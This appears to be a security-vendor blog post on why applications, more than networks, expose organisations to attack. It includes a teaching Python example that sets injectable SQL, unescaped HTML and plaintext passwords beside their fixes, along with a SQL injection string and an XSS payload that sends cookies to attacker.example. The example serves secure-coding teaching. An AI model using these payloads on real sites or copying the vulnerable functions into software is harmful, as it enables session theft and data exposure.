Here’s a hair-raising statistic: 70-90% of vulnerabilities exist in applications, not in networks. This means that whatever fancy firewall, IPS, EDR, SIEM or other network security measures you’ve put in place, attackers can still breach your organization through any internet-connected application on devices in your network. Chances are, most of your employees use at least one cloud-based application, such as Google Docs, which means your network is potentially at risk. Web apps talk to the internet over HTTP (port 80) or HTTPS (port 443), and a perimeter firewall that blocks almost everything else still has to let that traffic through. Whatever comes back over those permitted connections (a malicious response, a booby-trapped file, a compromised script) is handled by the application itself, not by the firewall, so the security of your network is in the hands of the developer(s) behind your apps.
If you’re new to the cyber security field, you might be asking yourself, “So, can’t you just write secure software?” This is an excellent question with a somewhat complicated answer, the short version of which is “sort of”. Unfortunately, you can never be totally certain that your software is secure.
The long version comes to you in three parts:
1. Developers have priorities
2. Zero-Day exploits
3. Users can undermine even the most secure software
Let’s start from the top, shall we?
Developers Have Priorities
Sometimes security experts, in the middle of a tirade against this or that security oversight, forget that software developers have lots of priorities beyond security. Developers also have to worry about functionality, efficiency, consistency and efficacy. From a developer’s perspective, security controls can mean extra code, extra latency and extra friction for users, and developers who produce unfriendly software might find themselves short on work.
That being said, the risks associated with a company running insecure code are growing every year, and companies would be wise to ensure their software developers implement security best practice, even if it adds some bloat. Developer priorities stem from the demands of their employers, so if security is a priority for your company, let your developers know, and give them a little time to brush up on security best practice. Also, vulnerabilities become exponentially more expensive to fix as the software nears completion: a flaw fixed after release costs roughly 30 times as much as the same flaw fixed in the initial design phase (The Business Case For Security In The SDLC).
Zero-Day Exploits
Even the biggest software applications from the biggest companies can fail. In 2013, Adobe was breached, and the attackers walked away with roughly 150 million account records (user IDs and encrypted, rather than hashed, passwords), encrypted payment card details for close to three million customers, and source code for several Adobe products, including Acrobat. How the attackers first got in was never detailed publicly, but stolen source code of that kind is exactly the raw material an attacker uses to hunt for zero-day vulnerabilities in a product.
What is a zero-day vulnerability? Essentially, it’s a security flaw that was overlooked by the developers during the production of a piece of software and that attackers discover and exploit before the vendor has a fix (the vendor has had “zero days” to patch it). Once the exploitation becomes known, the developers have to scramble to patch the vulnerability before excessive damage is done.
These vulnerabilities exist partly because of the sheer size of many software development projects. Even if the developers were coding using best-practice techniques, applications can aggregate hundreds of thousands or millions of lines of code before they are released, making it nearly impossible to close every possible gap. The fact that more of these widely distributed applications aren’t breached is a testament to the skill of professional developers and security professionals, but the point remains that a dedicated attacker, willing to pore over every line of code searching for flaws, will likely find one eventually.
The message here is that the more secure your code is, the harder it is for an attacker to discover a zero-day vulnerability, and if you close almost every security gap, a breach may no longer be worth the attacker’s effort.
Users Can Undermine Secure Code
According to a research project conducted by the Ponemon Institute, the biggest security risks in 2015 were careless employees who used personal devices for work and/or worked from outside the office. It’s not hard to see why these behaviors are risky: connecting to company networks from insecure Wi-Fi, like you might find at a local coffee shop, lets an attacker on the same network intercept traffic or push malware onto the employee’s personal device. Furthermore, because it is difficult to monitor the software running on employee devices, you never know when somebody will bring an application with an unpatched zero-day vulnerability into your network. It’s also possible for an employee to pick up malware at home that then spreads into your company over their trusted connection. If attackers gather sensitive information, such as the architecture of your network, the nature of your network devices, or the cloud software commonly used in your company, it gives them ideas about how to attack most effectively in the future.
To be as safe as possible in today’s hostile internet environment, security awareness and training are paramount. Your employees need to be versed in how to safely manage devices used for work, developers need to produce software with secure code, and company higher-ups need to make these measures a priority. Without a directed effort, breaches of the caliber of the Adobe leak might become horrifyingly common.
Having seen first hand the damage these threats pose, we built our team with these problems front of mind, but even then we were shocked by how bad the problem really is. When recruiting software developers at LMNTRIX, we tested over 160 candidates using the Secure Code Warrior SaaS platform on 12 basic secure coding challenges, such as locating and identifying a solution for Cross-Site Scripting, Injection Flaws and Authentication. All developers had between 6 and 14 years’ experience, and each was given two hours to complete the challenges, with access to Google. Candidates scored 10%-30%; the result was astonishing, to say the least!
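The three challenge classes named above, in miniature. This is an added example for this page, not LMNTRIX code and not a Secure Code Warrior challenge: each vulnerable function sits beside its fixed form (string-built SQL versus a parameterised query, raw HTML interpolation versus context-appropriate escaping, plaintext password comparison versus a salted PBKDF2 hash with a constant-time check). The users table, the attacker payloads and the password are constructed for illustration.

```python
"""Vulnerable vs. hardened handling of untrusted input: SQL injection, XSS, authentication.

Added example, not the original page's code. The database rows, the attacker
payloads and the password below are constructed for illustration.
"""
import hashlib
import hmac
import html
import os
import sqlite3

PBKDF2_ROUNDS = 200_000  # assumption for the example; tune to your hardware


def make_db() -> sqlite3.Connection:
    """Constructed in-memory database with a two-row users table."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (username TEXT, display_name TEXT, is_admin INTEGER)")
    conn.executemany(
        "INSERT INTO users VALUES (?, ?, ?)",
        [("alice", "Alice", 1), ("bob", "Bob", 0)],
    )
    return conn


# --- Injection -------------------------------------------------------------

def lookup_user_vulnerable(conn: sqlite3.Connection, username: str) -> list:
    """Builds the query by string formatting, so attacker input becomes SQL."""
    query = f"SELECT username, display_name FROM users WHERE username = '{username}'"
    return conn.execute(query).fetchall()


def lookup_user_safe(conn: sqlite3.Connection, username: str) -> list:
    """Parameterised query: the value travels separately from the SQL text."""
    query = "SELECT username, display_name FROM users WHERE username = ?"
    return conn.execute(query, (username,)).fetchall()


# --- Cross-Site Scripting --------------------------------------------------

def render_profile_vulnerable(display_name: str) -> str:
    """Interpolates a stored value straight into HTML element content."""
    return f"<h1>Welcome, {display_name}</h1>"


def render_profile_safe(display_name: str) -> str:
    """HTML-encodes the value for the context it lands in (element content)."""
    return f"<h1>Welcome, {html.escape(display_name, quote=True)}</h1>"


# --- Authentication --------------------------------------------------------

def store_password_vulnerable(password: str) -> str:
    """Stores the password as-is; a database leak exposes every account."""
    return password


def check_password_vulnerable(candidate: str, stored: str) -> bool:
    """Plain comparison of plaintext: short-circuits on the first differing byte."""
    return candidate == stored


def hash_password(password: str, salt: bytes = b"") -> tuple:
    """Salted PBKDF2-HMAC-SHA256; only the salt and digest are ever stored."""
    salt = salt or os.urandom(16)
    digest = hashlib.pbkdf2_hmac("sha256", password.encode(), salt, PBKDF2_ROUNDS)
    return salt, digest


def verify_password(candidate: str, salt: bytes, digest: bytes) -> bool:
    """Recompute the digest and compare in constant time."""
    recomputed = hashlib.pbkdf2_hmac("sha256", candidate.encode(), salt, PBKDF2_ROUNDS)
    return hmac.compare_digest(recomputed, digest)


# Constructed attacker-controlled inputs.
INJECTION_PAYLOAD = "' OR '1'='1"
XSS_PAYLOAD = "<script>document.location='https://attacker.example/?c='+document.cookie</script>"


def demo() -> dict:
    """Run each payload through the vulnerable and the safe code path."""
    conn = make_db()
    return {
        "vuln_rows": lookup_user_vulnerable(conn, INJECTION_PAYLOAD),  # tautology: every row
        "safe_rows": lookup_user_safe(conn, INJECTION_PAYLOAD),        # no such username
        "vuln_html": render_profile_vulnerable(XSS_PAYLOAD),           # script executes
        "safe_html": render_profile_safe(XSS_PAYLOAD),                 # rendered as text
    }


if __name__ == "__main__":
    for name, value in demo().items():
        print(f"{name}: {value}")
```

The injection payload turns the vulnerable query into `WHERE username = '' OR '1'='1'`, which matches every row; the parameterised version treats the same string as a literal username and finds nothing. The XSS payload survives intact in the vulnerable template and becomes inert `&lt;script&gt;...` text in the escaped one. The two password helpers differ in what a leaked table gives an attacker (the password itself versus a salted, slow-to-brute-force digest) and in how the check is performed.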
Finding good developers is challenging, and finding ones who can code securely is next to impossible for most industries, as software takes hold of everything from IoT devices and automobiles to financial trading applications and healthcare.
Most companies are faced with having to maintain software quality and security while accelerating innovation. Even companies with institutionalized, standard code development processes need new ways to further reduce overall program risk, because the old method of testing software for security only at the end of the development cycle is clearly not working.
To address security more effectively, companies need to adopt secure development lifecycle initiatives in which security deliverables (threat models, secure design review, code review and security testing, for example) are inserted into every phase of development. This results in fewer security incidents, faster remediation and earlier visibility into areas of risk.
On 2017-05-03